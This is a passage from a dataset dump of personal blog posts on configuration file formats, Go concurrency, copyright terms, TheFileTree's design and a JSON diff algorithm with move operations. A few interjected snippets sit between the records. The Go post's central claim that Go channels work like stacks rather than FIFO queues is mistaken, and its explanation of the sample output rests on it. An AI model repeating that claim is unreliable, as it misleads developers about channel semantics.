Why is it bad?\n\n[So](http://harmful.cat-v.org/software/xml/) [many](http://c2.com/cgi/wiki?XmlIsTooComplex) [people](http://wiki.whatwg.org/wiki/Namespace_confusion) [have](http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-August/015905.html) [eloquently](http://www.tbray.org/ongoing/When/200x/2003/12/13/MegaXML) [discussed](http://nothing-more.blogspot.ch/2004/10/loving-and-hating-xml-namespaces_21.html) [it](http://intertwingly.net/slides/2004/devcon/77.html). It boils down to this:\n\n1. Starting on an XML-based project is usually a nightmare,\n2. All by itself, XML is actually *more limited* than our old friend plist.\n It's just text, you have to build your own format on top of it,\n which in turn adds complexity and cruft and makes #1 worse!\n3. Namespaces are unintuitive, hard to use, and make #1 and #2 even worse…\n\nTo support its complexity, XML has developed satellite sublanguages of its own to configure it: XPATH, SAX, XSLT, XSD, DTD…\nCan XML data crash a browser or worse? [Of course it can](http://en.wikipedia.org/wiki/Billion_laughs). Is it Turing-complete? It can be…\n\nIn the end, it all boils down to one thing: it is too complex. It is hard to read, hard to parse, and because of draconian error handling, you'd better not have made a mistake. But remember, spotting a mistake is hard, better use a validator. Or an external GUI that will make the source ugly.\nA wise man once said: \"it combines the space-efficiency of text-based formats, and the readability of binary.\"\n\nIn a world dominated by XML, JSON was a gasp of fresh air.\nIts syntax is minimal. It has all the data structures you look for. Writing a parser is a matter of a couple of hours; not that you need to. Reading it is easy too. Just like [asm.js](http://asmjs.org/), it fitted perfectly as a natural extension to the Web platform, because it was already there.\n\nJSON gains ground. It has both a [lot](http://www.ietf.org/rfc/rfc4627.txt?number=4627) [of](https://npmjs.org/doc/json.html) [acceptance](https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-ux/firefox-21.0a1.en-US.linux-x86_64.json) and good press.\n\nYet, everything has bad parts, and JSON is no exception:\n\n- It feels painfully draconian in its handling of errors for one simple reason: people forget to remove the trailing comma in `[1, 2, 3,]`\n- It doesn't have comments, which makes it unsuitable for readable configuration.\n\nAware of those small annoyances, I had privately started to work on my own replacement.\n\nThen, one drunk night, a week ago, Tom Preston-Werner, fed up as I was about the status quo, decided to take no more, and created TOML.\n\n[TOML](https://github.com/mojombo/toml/) is meant to be solidly standardized, unlike INI. However, it is meant to be just as limited. It does have JSON arrays, and it thought to authorize trailing commas (which I like to believe I had something to do with).\n\nI wrote about TOML's shortcomings [there](https://gist.github.com/espadrine/5028426), let me rewrite those here:\n\n- The primary issue is that you can't have dictionary maps inside of arrays.\nI see this pattern in many configuration files, from Sublime Text to server configuration. That is just sad. First-class maps are more useful than first-class dates.\n- Having homogeneous arrays is an artificial restriction that doesn't actually serve a higher purpose. I believe the hope is that static languages will benefit from it. They won't.\n- The way you edit the main dictionary map is quite limited itself. 
Keys need to be grouped in a strange, sometimes counter-intuitive way. I say that from the experience of trying to convert JSON settings file to TOML. Frustration.\n- Even if the file is encoded in UTF-16, every string must be encoded in UTF-8 — I repeat, inside of a UTF-16 file. Text editors will love this, if the standard is applied to the letter.\n\nIn short, TOML isn't as good as the OpenStep plist format, but it has its niceties. And no, it didn't invent first-class Dates.\n\nIt felt unfortunate to see a new format fail to be greater than its historic predecessors.\nThey say history is repeated as farce first, then as tragedy; the plist switch to XML was the farce, switching from JSON to TOML would be tragedy.\n\nAs a response, I published [DotSet](https://github.com/espadrine/dotset), the Settings File Format I pioneered.\n\nThe data structures are so close to JSON that they are interchangeable. I [had fun](http://espadrine.github.com/dotset/) with that. [Really](http://espadrine.github.com/dotset/).\n\nHowever, remember JSON's shortcomings that I mentioned above?\nI erased them. I ended up with a language as pleasant to read as Python,\nas easy to write as plain text, and very simple. Simpler than TOML, with more power. I made a `node` [parser / stringifier](https://npmjs.org/package/dotset) for it. It was easy. And fun.\n\n----\n\nAnd now, the crystal ball.\n\nIt seems to me like there are two future directions for configuration:\n\n- JSON-compatible textual files acting as hierarchical databases lacking only the file system support that could bring the efficiency it deserves,\n- Turing-complete programming languages: [node.js](http://nodejs.org/) servers are configured in JS (compare that with [Apache](http://httpd.apache.org/docs/2.4/configuring.html) configuration); [Guix](http://www.gnu.org/software/guix/) is a package manager whose configuration is all written in [Guile](http://www.gnu.org/software/guile/), the acclaimed [Scheme](http://scheme-reports.org/) interpreter / compiler. Those languages have in turn a subset for data literals that fit the above description of JSON-compatible data.\n\nFunny thought: the [Lua](http://lua.org/) programming language was initially meant to be a configuration file format. Ha ha ha.\n\nOk, not *that* funny.\n\nAll this to end there: TOML doesn't fit in the picture. It will one day, but then, it will have the complexity of YAML and awkwardly combined features. You will need whiskey to ignore that.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-03-05T13:03:00Z\",\n \"keywords\": \"\" }\n</script>\n"
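To make the “maps in lists” column of the table above concrete, here is the kind of value (an invented example) that JSON, Plist and DotSet express natively, and that INI, .properties and the TOML of that time could not:

    { "servers": [ { "host": "a.example.com", "port": 8080 },
                   { "host": "b.example.com", "port": 8081 } ] }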
},
{
"alpha_fraction": 0.750713586807251,
"alphanum_fraction": 0.7722803950309753,
"avg_line_length": 75.90243530273438,
"blob_id": "47da31f7e4fb74e8fb3cb92843eca6851704664e",
"content_id": "b8afeba2d28e75a7acb9ddc60696967858ee6583",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3153,
"license_type": "no_license",
"max_line_length": 289,
"num_lines": 41,
"path": "/blog/src/what-i-made-in-2016.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Made In 2016\n\nThis year, the company I work for, Captain Train, was purchased by its English counterpart, Trainline. I added support for American Express BTA lodged cards, upgraded the SNCF integration to support their new fare systems, and worked on the common format for carriers.\n\nIn open-source, I made the following.\n\n- A natural-language-processing bot library [queread][], in order to power [travelbot][], a CLI and Slack bot system which you can ask for travel information across Europe. It uses [travel-scrapper][], which relies on the Trainline websites for data.\n- A multiplayer musical editor on top of TheFileTree, as a flexible textual editor. See [this example][musical editor].\n- [Email-Login][] is now robust and ready to use.\n- [Spash][], a [geohash][]-inspired Spacetime locator.\n- The [json-diff][] gem offers a brand-new algorithm for diffing JSON content, with support for in-array object move operations as a first-class citizen, unlike existing LCS-based approaches, resulting in better output. I even published a [blog post][] on Trainline's blog.\n- The [json-api-vanilla][] gem parses [JSONAPI][] payloads (ie. JSON with references, to support object graphs with reference cycles, etc.) and converts it to vanilla Ruby objects, with references correctly hooked up, without *any class definition needed*, unlike what existed before that.\n- The [Canop protocol][] was finalized and implemented. [This commit][canop rebase] in particular finally implemented proper index shifting for intention preservation, so that people can edit the same text file simultaneously without losing their changes.\n- The [json-sync][] project sprung out of the Canop effort. Unlike Canop, it cannot yet perform intention preservation. However, its design supports peer-to-peer networks, unlike Canop which is centralized.\n\nI took greater concern in explaining my projects. People wouldn't understand the schematics for the first automobile, but a simple demonstration is enough to blow everybody's mind.\n\n[Previously][].\n\n[queread]: https://github.com/espadrine/queread\n[travelbot]: https://github.com/espadrine/travelbot\n[travel-scrapper]: https://github.com/espadrine/travel-scrapper\n[musical editor]: https://thefiletree.com/david/audio/test.abc\n[Email-Login]: https://github.com/espadrine/email-login\n[Spash]: https://espadrine.github.io/spash/\n[geohash]: https://en.wikipedia.org/wiki/Geohash\n[json-diff]: https://github.com/espadrine/json-diff\n[JSONAPI]: http://jsonapi.org/\n[json-api-vanilla]: https://github.com/espadrine/json-api-vanilla\n[json-sync]: https://github.com/espadrine/json-sync\n[Canop protocol]: https://github.com/espadrine/canop/blob/master/doc/protocol.md\n[canop rebase]: https://github.com/espadrine/canop/commit/b0f37b2cc789513e9c8bd1986e113bed6580328f\n[blog post]: https://engineering.thetrainline.com/2016/10/05/how-we-switched-without-a-hitch-to-a-new-api/\n[Previously]: http://espadrine.tumblr.com/post/138229350686/what-i-did-in-2015\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-06-16T20:12:00Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.745498538017273,
"alphanum_fraction": 0.7515453100204468,
"avg_line_length": 48.284767150878906,
"blob_id": "a3d5980701dcb48f50b5ed290afd35c8d18806ba",
"content_id": "74ee1f0af113153b486ec5cac69921b3fe180b5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7478,
"license_type": "no_license",
"max_line_length": 442,
"num_lines": 151,
"path": "/blog/src/go-channels-are-stacks-and-would-benefit-from-stm.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Go Channels Are Stacks And Would Benefit From STM\n\nI was experimenting with **Go channels**, the other day,\nand for some reason the following code surprised me.\n\n package main\n \n import \"fmt\"\n \n var n = 0\n \n func send(c chan int) {\n for i := 0; i < 3; i++ {\n c <- n\n n++\n }\n }\n\n func get(n int, c chan int) {\n for i := 0; i < 3; i++ {\n fmt.Println(n, \"get\", <-c)\n }\n }\n\n func main() {\n c := make(chan int)\n go send(c)\n go send(c)\n\n go get(1, c)\n get(2, c)\n }\n\nIndeed, I expected channels to work like a FIFO, where in fact they work like a stack.\n\nAs a result, the output was the following:\n\n 1 get 1\n 1 get 1\n 2 get 0\n 1 get 2\n 2 get 4\n 2 get 5\n\nSomething to note is that this output is predictable, and depends only on the number of cores available on the machine it runs on. I’ll discuss this more in length later.\n\n## What Happened There?\n\nIf channels worked like FIFO, each channel would have an entry point and an end point. Sending an element to the channel would put something to the entry point, and that element would be obtained, in the same order, at the end point.\n\nHowever, as can be noticed from the output, we receive the 1 before the 0. The reason for that is, well, that Go’s duplex channels are stacks. Senders and receivers use the same end point to put data in and to get data out.\n\n* The `send` function puts 0 in the channel,\n* The `send` function puts the first 1 in the channel,\n* At this point, the first `send` goroutine hasn’t yet incremented n, while the other `send` goroutine adds n (which is still 1) to the channel’s stack.\n* Then the first get goroutine starts reading the channel. It gets two 1s.\n* The second get goroutine then reads the channel, and gets the 0 that was first sent to the channel.\n* The rest of the output is pretty straightforward.\n\n## Locks Are Bad\n\nRemember that “double 1, but no 3” issue we saw? How would we solve that?\n\nThe issue here is: there is a variable shared between two goroutines. That variable acts like a structure that only stays coherent if the following operation is atomic:\n\n1. send the variable’s value to the channel,\n2. increment the variable.\nOf course, that isn’t atomic, and this is the reason why we get issues.\n\nOf course, this issue is an elementary concurrency problem which has been solved hundreds and hundreds of times.\n\nThe issue, to me, is that the advised solution (that is, the solution advocated by the Go authors), is to use locks. Locks have great known issues. First of all, locks must be applied in the same order when applying them and removing them; but that is the least of locks’ problem. Unfortunately, the fact that a piece of code uses locks correctly doesn’t ensure that integrating this piece of code with another won’t just run into a deadlock.\n\nThe famed example is that of the philosopher’s dinner.\n\nImagine a table with as many plates as there are philosophers, and one fork between each plate. Each philosopher works like a goroutine that needs to access the left fork and the right fork simultaneously, if he wants to eat. Each fork is a shared variable. Place a lock on it: each philosopher will lock the fork on their right, then try to lock the fork on their left, and you’ll get a deadlock.\n\nThe solution to this problem is to have a “conductor” which gives permission to take a fork. 
The conductor has access to more information than any of the philosophers, and if he sees that a philosopher taking a fork will lead to a deadlock, he can refuse him the fork.\n\nThat mechanism is what we call a semaphore. Unfortunately, a very simple modification to the problem makes a deadlock very likely. For instance, if another philosopher joins the party without the conductor’s knowledge, you’re likely to run into trouble.\n\nLinux has slowly tried to switch from locks to a synchronization mechanism called RCU (Read-Copy-Update), which keeps reads cheap and puts the cost on writes, with the assumption that we read data more often than we write to it. Most deadlocks / livelocks are not applicable to RCU. But again, some deadlocks can still happen; besides, RCU can be hard to apply to a data structure.\n\nSo, locks are not composable. Can we do better than this?\n\nGo is famous for the following saying.\n\n> Don't communicate by sharing memory, share memory by communicating.\n\nIndeed, you can solve the philosophers' problem by communicating.\nThat is the *Chandy / Misra solution*. Each philosopher but one takes the fork on his right.\nThe remaining one takes the fork on his left.\nThen, whenever they need a fork, they request it from its owner,\nwho gives it up if he is done eating.\nThis brilliant solution doesn't stop at\navoiding deadlocks; it also avoids livelocks by adding a \"dirty fork\" system.\nPhilosophers hand over forks that they have used, and the new user of a fork cleans it.\nOn the other hand, philosophers cannot give away a clean fork.\nThat way, there is a guarantee that forks are really used.\n\nI actually wonder why Tony Hoare didn't think of that solution when writing\n[his famous CSP paper](http://www.usingcsp.com/cspbook.pdf).\n\nI believe you can use channels for any concurrency problem, but sometimes the solution\ncan be hard to find. Maybe this is the reason why the Go authors feature slides\nthat use mutexes, or why they have a mutex package in the standard library to begin with.\n\nIf channels are hard, don't fall back to a dangerous primitive such as mutexes;\nuse an equally powerful one!\n\nLately, there has been an interesting project, called **STM**\n(Software Transactional Memory),\nwhich has been pioneered by Haskell's GHC compiler. It uses three primitives,\n`atomically`, `retry` and `orElse`, and encapsulates sensitive data in an STM shell,\nto ensure that those variables are protected from all issues related to deadlocks.\nWithin an `atomically` block, modifications to those variables are logged. All operations\nare reversible. If the variable has been changed in the meantime, those operations are\nrolled back, and the block is tried again, until it is committed for good.\n\nThis system, which may remind you of what concurrent databases have done for years,\nis so simple and so bright that Intel has decided to implement it in hardware\nin future chips.\n\nI can only hope that programming languages make it easy to use this capability.\nEspecially considering how long we have been struggling with those issues.\n\n## One Last Thing…\n\nSome in-depth information.\n\nRight now, each goroutine has a segmented stack that starts at 4 kB and grows if, at\nthe start of a function call, more stack space is needed than is available.\n\nThe scheduler that switches from one goroutine to the next actually has no preemption capability.\nThose goroutines are doing simple cooperative multithreading.\nEvery time a goroutine reads from a channel, it waits, and the scheduler looks for another\ngoroutine to run. If none are available, we get a deadlock.\n\nObviously, adding preemption, which is something that I believe the Go authors plan on doing,\nwould make race conditions that much harder to debug.\n\nAs a result, I really hope they start implementing and advocating for STM\nsoon.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n  \"@type\": \"BlogPosting\",\n  \"datePublished\": \"2012-07-02T21:44:00Z\",\n  \"keywords\": \"go\" }\n</script>\n"
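To make the commit-or-retry protocol concrete, here is a toy version-checked transaction in JavaScript. It is purely schematic (all names are mine, JavaScript is single-threaded, and a real STM tracks read/write sets per variable rather than a single version counter):

    // Run `transaction` against a versioned cell, committing only if
    // no concurrent commit touched the cell since we read it;
    // otherwise discard the computed value and try again.
    function atomically(cell, transaction) {
      for (;;) {
        var seen = cell.version;
        var next = transaction(cell.value); // Must be side-effect free.
        if (cell.version === seen) {        // Unchanged: commit.
          cell.value = next;
          cell.version += 1;
          return next;
        }
        // Someone committed in between: roll back and retry.
      }
    }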
},
{
"alpha_fraction": 0.7639680504798889,
"alphanum_fraction": 0.7818319797515869,
"avg_line_length": 108.625,
"blob_id": "619f4d5c2b769edbced32a9d2c2fd87c6bfcb523",
"content_id": "c2e6117a216e47edff60be841dc9a0a7a40d59be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2649,
"license_type": "no_license",
"max_line_length": 536,
"num_lines": 24,
"path": "/blog/src/public-domain-shadow.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Public Domain Shadow\n\nCopyright is one of those laws that make sense in principle, but whose application got twisted so terribly by lobbies that they lost their meaning. It is fantastic to have laws protecting your work as an author! But everybody dies. The idea that you should receive money after your death was the start of the absurdity that copyright has turned into.\n\nCopyright was first put into law through Britain’s Statute of Anne in 1710. The intent was to give an incentive and a remuneration to printers and authors. The new law prescribed a copyright term of 14 years, and allowed renewal for another term.\n\nMore and more countries adopted copyright laws. They eventually all encompassed the author’s whole life. In the midst of the French Revolution, as privileges of the royalty were dropped, they voted a law in 1791 to help the authors that stirred the Revolution. In case their children needed help after the death of their parents, they included a 5-year span where the copyright was inherited.\n\nThat 5-year span got increased time and time again, lobbies helping, up to the 70 years that it now is.\n\nAn interesting impact of those increases is that there are large chunks of time where no piece of art could enter the public domain. I plotted those chunks in red: during those periods, the public domain stagnates. In order to help visualize why, I also plotted for a few years the time when the production of that year’s dead artists would eventually enter public domain by reaching the blue line. The post-mortem age of this art creates rays that are interrupted by the change in law, producing what I call a **Public Domain Shadow**.\n\n\n\nSurprisingly, we currently are in a Public Domain Shadow which will end in 2019, unless copyright gets extended yet again. Until then, we won't get to remix anything new.\n\nThe post-mortem inheritance of copyright has gone too far. 5 years was arguable, but excessive; 70 gives a new meaning to excess. An example of their absurdity: “[Petit Papa Noël](https://www.youtube.com/watch?v=rR5NyGhKQkc)”, a song so anchored in France’s culture that it is practically its “Twinkle, Twinkle, Little Star” (or it would be if that song wasn’t also French), will only come out of copyright in 2055. The composer was born in 1905: he would be 150 years old when it will finally be public domain.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-12-27T19:42:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.7723308801651001,
"alphanum_fraction": 0.7768088579177856,
"avg_line_length": 79.05660247802734,
"blob_id": "c16aa92ac1db3fb38d697e98c5ab8fb5d6be4217",
"content_id": "33aa16048a84782b5a84d0189da309fb395f5cf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4243,
"license_type": "no_license",
"max_line_length": 699,
"num_lines": 53,
"path": "/blog/src/thefiletree-design-log-1.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 1: Metadata\n\nI intend to rethink the ideas behind [TheFileTree](https://thefiletree.com).\n\n# Files\n\nEasy storage has a lot of competition, but the contenders often miss two important points.\n\n1. Content needs to be edited, and since this is online, it needs seemless intent-preserving synchronization.\n2. Data needs to be manipulated by programs, and since this is online, it needs to execute from within your tab.\n\nObviously, I need to have the basics working.\n\nEach node of the tree is a file or a folder. They have metadata information detailing their type, time of last modification (and of last metadata update, to allow controlling changes), and various other fields to allow specifying which app to use to open a particular file. All that metadata is stored in a file called `metadata.json`, loaded in memory at start-up on the server. That way, metadata accesses are fast. In the future, we can offload parts to disk in a format that makes path accesses fast. *(In the past, each file had a separate json file holding its metadata, but the main page, for instance, lists files in order of modification (freshest first), which meant a lot of file reads.)*\n\n\n\nWhen you fetch a node, it inspects its metadata, and shows you its content using its dedicated app. If there are none, or if you specify it, you can get it raw, with `?app=data`. You can also get its metadata with `?app=metadata`. For folders, the data is a list of the file names it contains. You can even submit a `Depth` header, inspired by WebDAV.\n\n\n\nUnsurprisingly, the download size scales exponentially with the requested depth.\n\nI'll talk about other basics we must support in future logs.\n\n# Collaboration\n\nThe simple fact that a file online can be opened in multiple tabs means that we need edition synchronization.\n\nI have plans to make [jsonsync](https://github.com/espadrine/jsonsync) the first non-Operation Transformation, non-CRDT peer-to-peer synchronization system for JSON with index preservation. It has the benefits of both approaches: implementation simplicity, richness of operations and intention preservation of CRDT, and query speed and memory bounds of OT.\n\nAny apps can probably maintain its content in a JSON structure, and update its UI according to changes in its data. Is that not reminiscent of the MVC pattern? I expect virtually any application to be built on top of those primitives.\n\nI am unsure of whether I will rely on it to allow for offline edition. Whatever I do after an offline editing session, it will involve showing the user a diff of the content; as a user, I would not trust a blind merge for long, multiple-second simultaneous edition. But will I use jsonsync's algorithm, requiring it to hold on to its history for ever, or a cold three-way merge? Maybe something in-between?\n\n# Extension\n\nShops are the economy's blood. Marketplaces are its heart.\n\nI must ensure that anybody can create a new app. They can store it in a folder anywhere, and develop it from within TheFileTree. Anyone can open anything with any app. There is a tricky matter of trust there: we must warn users that they're about to use an app they hav never used before, to avoid information stealing from malicious app developers. It cannot happen from within the folder app, since they may land on a page from a crafted link sent to them. Still, it can be done; I am not too worried.\n\nSomething I am more worried about is whether I should allow apps to execute code on the server. 
I am leaning towards a \"no\", as I don't like taking that security risk. What if they find a way to gain shell access to the server?\n\nEven without being allowed to execute code, apps can do anything, by making XHR requests to the server, using the API I will provide. Maybe HTTP2 Server Push will allow me to avoid waiting for the XHR call to send the data over, too, one day.\n\nI'll talk about identity control in a future log. Obviously an important aspect.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-12-20T21:39:00Z\",\n \"keywords\": \"tree\" }\n</script>\n"
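For illustration, a plausible shape for one entry of the `metadata.json` file described above (the field names are my guess, not TheFileTree's actual schema):

    { "blog/index.html": {
        "type": "text/html",
        "updated": "2016-12-20T21:39:00Z",
        "metaUpdated": "2016-12-20T21:39:00Z",
        "app": "text" } }

A nested folder listing would then be fetched with something like `curl -H 'Depth: 2' 'https://thefiletree.com/blog/?app=metadata'` (again a sketch, not the documented API).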
},
{
"alpha_fraction": 0.7689501047134399,
"alphanum_fraction": 0.7807917594909668,
"avg_line_length": 106.59259033203125,
"blob_id": "400f3a0965446faac7ca7137d8aee5ff83a8eb85",
"content_id": "fad45824339d812adce2b85ec418bf11d5bdec56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14599,
"license_type": "no_license",
"max_line_length": 912,
"num_lines": 135,
"path": "/blog/src/json-diff-with-first-class-move-operations.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# JSON Diff With First-Class Move Operations\n\n_(This was first posted [here](https://blog.trainline.fr/12389-algorithme-diff-json) in French and [there](https://engineering.thetrainline.com/2016/10/05/how-we-switched-without-a-hitch-to-a-new-api/) in English.)_\n\nBack in January, here at Trainline Europe, we learnt that SNCF, the main French railway company, wanted to update their fare system — that is, the set of rules which determine their ticket prices. The plan was to scrap congestion pricing on TGVs (France’s high-speed trains), reduce sudden price increases, introduce so many offers to discount card owners that it would feel like Christmas!\n\nHowever, those goals were not without challenges. Just as a princess must defeat a dragon to free her Prince Charming, SNCF had to fight the complexity of its current fare system to extract a pearl from its ashes. The blood from this fight had to drip onto their partners: counter agents, travel agencies, [GDS](https://en.wikipedia.org/wiki/Global_Distribution_System)es… and yours truly.\n\n\n\n_Fighting fare systems requires extensive equipment._\n\n## A New Search API Is Born\n\nSomeone at Trainline Europe (formerly Captain Train) had to update our code to the new fare system, and I volunteered. It would be a large and sensitive project, as we had to port our SNCF search engine to use a different [API](https://en.wikipedia.org/wiki/Application_programming_interface). We taught a new language to our train search engine, in a way.\n\nDetect changes between old and new results\n\nThis engine converts (carrier-specific) search results into an intermediate format for internal use, common to all carriers. The input to this conversion was about to change significantly, but the output needed to stay identical. Indeed, the new SNCF search API, to which we were about to connect, can offer both the old and the new fare system, up to the very day on which the new fare system would be released to the world.\n\nAfter working on it for a while, we got the format conversion working. It was then time to ensure that nothing would change for our users. So I tweaked our train search engine to re-execute searches of a subset of our users in production, once the first, original search had been performed with the old engine. Once this was done, I saved the [JSON](https://en.wikipedia.org/wiki/JSON) output of the old and new engines side by side.\n\nI now had a large quantity of “before / after” files, of which each pair was supposedly identical. Of course, those files were not literally identical. Would you expect fate to be so kind? They contained random keys here, newly ordered lists there, such that a trival [`diff`](https://en.wikipedia.org/wiki/Diff) of the files was out of the question.\n\nHad a `diff` been possible, it would still not have helped me understand why the two files were different, since it only sees line changes, not structural ones. I needed a diff which was able to understand the structure of JSON. Each difference was a bug.\n\nI went looking for such an algorithm, I hopped from library to program, all claiming they could diff me some JSON. What I found gave reasonable results, but they all suffered from tremendous false-positive flagging. In particular, they all broke their teeth against having JSON lists used as sets. Although the order of the items was irrelevant, it was flagged as a complex reconstruction of the list. 
None of these tools could tell that the order of the items in the list had merely been shuffled around.\n\nWhy?\n\n## The Issue\n\nHow would you describe a change?\n\nWe could simply perform a bitwise comparison and declare: “Hello! Nothing has changed!” or “Everything is different!” Of course, our analytical abilities are then tiny. Imagine a gargantuan database in which a single insignificant integer is incremented. If your diff is only able to tell, “Remove the whole database, and recreate a brand new one that happens to be nearly identical”, your diff is much too fat. Additionally, you remove the intention hiding behind the change.\n\nIn JSON, most values cannot be nested; let’s call them atoms. For most uses, having a diff that uses a trivial comparison for atoms is fine. On the other hand, it needs to walk through the structures to be of any use. Objects are fine: unless you want to detect key renames, you simply compare values key-for-key. (For most uses, key renames are irrelevant.)\n\nTrouble starts with arrays. We could compare their values index-for-index — that is what [jsondiff](https://github.com/francois2metz/jsondiff) does, but unlike the other sacrifices that we have made, most uses are not content with that.\n\nMost array operations are commonly defined in terms of two fundamental actions: insertion and deletion. Let’s say we compare `[1, 2, 3]` and `[1, 3]`. A diff that describes it as “the 2 was incremented and the 3 was removed” is awkward compared to a simpler explanation, “we added a 2.” Occam’s razor strikes again.\n\nFinding the minimal number of insert / delete operations is equivalent to a classical problem in computer science, the [Longest Common Subsequence](https://en.wikipedia.org/wiki/Longest_common_subsequence_problem) (hereafter LCS). Luckily, it is a perfect match for [dynamic programming](https://en.wikipedia.org/wiki/Dynamic_programming), and one of its redeeming examples! The algorithm that solves it merely scans every pair of elements, one from the “before” list, the other from the “after” list, starting from the left of the lists. It registers identical elements as part of a potential longest common subsequence, and tracks from which pair each subsequence was possible. When it is done, the last cell lets you backtrack to the first cell, feeding you the list of operations needed along the way.\n\n\n\n_LCS conversion from αβγ to αγ. The arrows are operations, the circles are pairs of elements and contain sub-sequences._\n\nIt is so wonderful that everybody uses it, from `diff` to `git` to numerous DNA comparison software products. It is also what most libraries I found use. [rfc6902-json-diff](https://github.com/cqql/rfc6902-json-diff-js) relies on a variant, the Levenshtein distance, which also detects substitutions (literally equivalent to an addition followed by a deletion). [jsondiffpatch](https://github.com/benjamine/jsondiffpatch) tries to be smart by asking the user to feed it an object-identity algorithm, with which it can detect changes in position of list items. Finally, [hashdiff](https://github.com/liufengyun/hashdiff) includes a similarity algorithm which [tells LCS](https://github.com/liufengyun/hashdiff/blob/fff6fc28b51db16cdb6f005ef6aaea9a9a1f4d1e/lib/hashdiff/lcs.rb#L22) that two elements are identical if they are sufficiently similar, but it does not detect positional changes (and it is fairly slow).\n\nFundamentally, LCS only has fundamental operations: insertion and deletion. 
That is not enough to easily guess that an element has switched places! In fact, we would be better off if moving objects were a fundamental operation as well.\n\nFurthermore, LCS is designed for lists where identity is unambiguous. Even [jsondiffpatch](https://github.com/benjamine/jsondiffpatch) ends up performing a trivial [index-wise](https://github.com/benjamine/jsondiffpatch/blob/b7b7dfe52bbb4e88f3ecb87e2efbbb3af5f9c365/src/filters/arrays.js#L52) comparison when it has nothing else to work with! To be free from that flawed assumption, [hashdiff](https://github.com/liufengyun/hashdiff)’s idea is interesting: let’s compare the similarity of items!\n\n## The Similarity\n\nYou can probably get eight definitions of what JSON similarity is by asking five passers-by. I don’t pretend to have a better definition, but I did try to have one that works well with move operations.\n\nThe goal is to compute an arbitrary notion of how probable it is that one object is the result of modifying the other.\n\n* For objects, take the average similarity between key values. We ignore key renames.\n* For arrays, the most likely match between an element in the old and the new list is presumably the right one, so we take the average of the maximum similarity between each pair of elements of each list.\n* For atoms, we are fine with value equality.\n\n\n\n## Array Pairing\n\nFinding an ideal match between two lists sounds a lot like the [assignment problem for bipartite graphs](https://en.wikipedia.org/wiki/Assignment_problem). Imagine you own a fleet of available taxis. A set of passengers need picking up across town. The assignment problem wants to minimize the overall time that it takes for each taxi to arrive at a passenger’s location.\n\n\n\n_Above, minimizing the overall time. Below, minimizing the best time._\n\nIn our case, we want to minimize the best time, not the overall time. Among two array pairings of size 2, one with similarities 0.9 and 0.1, the other with similarities 0.8 and 0.4, one of the elements doesn’t seem to have been moved; it looks like an element was deleted and another was added. Given that, the pairing with 0.9 is most logical, and that is the one we want. Yet, maximizing the overall similarity would yield the inferior (0.8, 0.4) pairing.\n\n\n\nThe assignment problem has an O(n^3) polynomial solution, while the array pairing problem has an O(n^2) solution, which means it has the added bonus of being fast.\n\nIn fact, this problem is closer to the [weakly stable marriage problem](https://en.wikipedia.org/wiki/Stable_marriage_problem). However, it too can yield suboptimal results. Instead of optimizing for the highest similarity, it is content with any pairing for which no change could produce a pair with a higher similarity than each element of the pair had before. Depending on the ordering of elements in the lists, it can choose poorer pairings for our purposes.\n\nSome diffs offer move operations (such as [rfc6902-json-diff](https://github.com/cqql/rfc6902-json-diff-js), [jsondiffpatch](https://github.com/benjamine/jsondiffpatch)). However, array pairing is not just about detecting moves; we want to detect the most logical moves. The root of the problem with LCS is that it needs to know about exact equality. Our fuzzy pairing can detect the most likely equality. 
LCS targets a response with the highest number of elements remaining in the same order; our pairing targets one with the most intuitive moves.\n\nIts weakness is the quality of the similarity function, which empirically seems to give good answers, and can be improved by user-provided heuristics.\n\n## Index Shifting\n\nThere is quite a bit of fun in turning the indices we got from pairing (which come directly from the positions of the source and target arrays) to ones that can be used for patching purposes. Indeed, when applying the diff, we take each operation and apply it sequentially. We expect indices to be offset by previous operations.\n\nFor instance, `[3, 2]` diffed with `[1, 2, 3]` will detect a pairing from index 0 of the source to index 2 of the target, but since an element is inserted at the beginning of the list prior to the move operation, that operation must be from index 1 to 2, instead of 0 to 2.\n\nFirst, we need to perform all removals from the list, starting with the removal with the highest index (to avoid offsetting the subsequent removals). We compute from them a function that maps indices of elements of the list from where they were before the removals to where they are afterwards. We do the same, reversed, with the additions we plan to perform after the removals and the moves are done.\n\nWe now need two insights into the problem at hand.\n\n1. The pairs we have form a list of rings. Indeed, if whatever was at position i was sent to position j, whatever was at position j cannot have stayed at j. Therefore i goes to j, which goes to k, which goes to… well, at some point it has to come back to i, because the list is finite. Besides, we know that the source and target arrays have the same length.\n2. Each ring will rotate exactly once. When it does, no other element of the list will change position. As a result, a ring’s operations won’t offset the indices of the other rings.\n\nAs a result, the trickiest bit of the implementation is merely to detect offset changes in operations within a ring. Then we register the operations: first the removals, then the moves, then the additions. Done!\n\n## Format Design\n\nI will readily admit that producing a format that pleases all is impossible. That won’t stop me from judging 